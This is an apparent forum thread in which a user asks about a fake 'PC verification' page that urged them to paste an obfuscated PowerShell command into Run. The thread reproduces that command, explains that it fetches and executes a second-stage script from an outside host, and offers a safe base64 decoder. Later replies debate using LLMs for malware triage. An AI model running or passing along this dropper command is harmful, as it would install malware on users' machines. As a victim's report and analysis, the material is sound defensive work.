Yeah, don’t put this in, but can anyone give me an idea of what they were trying to do? The website was https://howchoo.com/3dprinting/updating-octoprint
and it used a realistic-looking PC verification screen to try to get me to paste this into Run:

conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1
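For anyone curious what the `/e` blob is: `powershell -e` takes a base64 encoding of UTF-16LE text, so you can inspect the script safely without ever executing it. A minimal sketch in Python (the redacted payload above decodes to something like `$site = Invoke-RestMethod 'https://mastraw.top/me/day'; iEx $s…`, i.e. fetch a second-stage script and run it with Invoke-Expression; the round-trip string below is just a benign placeholder):

```python
import base64

def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand payload (base64 of UTF-16LE text)."""
    # Pad to a multiple of 4 in case the blob was truncated or redacted.
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("utf-16-le", errors="replace")

# Benign round-trip example instead of the real payload:
encoded = base64.b64encode("Write-Host hi".encode("utf-16-le")).decode()
print(decode_encoded_command(encoded))  # Write-Host hi
```

Decoding like this (rather than pasting the command anywhere near a shell) tells you what the dropper does without any risk of running it.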

  • geekwithsoul@lemm.ee · 7 days ago

    Okay, but pretty much any malware is going to follow those same steps - they’re what makes it malware. The LLM doesn’t “prove” anything - it’s not examining the executable, and it’s not setting up a VM and doing deep packet analysis to see how the malware operates. It’s just parroting back the fact that this is malware, with details seeded from the prompt. This is like yelling into a canyon and “proving” someone is stuck down there yelling, because you heard an echo.

    No one should be using an LLM as a security backstop. It’s only going to catch the things that have already been seen before, and the minute a bad actor introduces something the least bit novel in the attack, the LLM is confidently going to say it isn’t malware because it hasn’t seen it before. A simple web search would have turned up essentially the same information and used only a small fraction of the resources.

    • Otter@lemmy.ca · 7 days ago

      That’s not what I meant though, I said that it speeds up the process of looking it up. It’s about as good as an unreliable peer that tells you what it thinks is happening. I can then research it myself based on the keywords that it mentions.

      It is similar to a web search, but with how bad search results are these days (in large part because of other people churning out LLM-generated garbage articles), I find that asking a locally hosted LLM gives me a better starting point. Since it’s running on my own modest hardware, I’m not as worried about the resource cost as I would be with the tech companies’ hosted models.

      I agree with everything else you’ve said though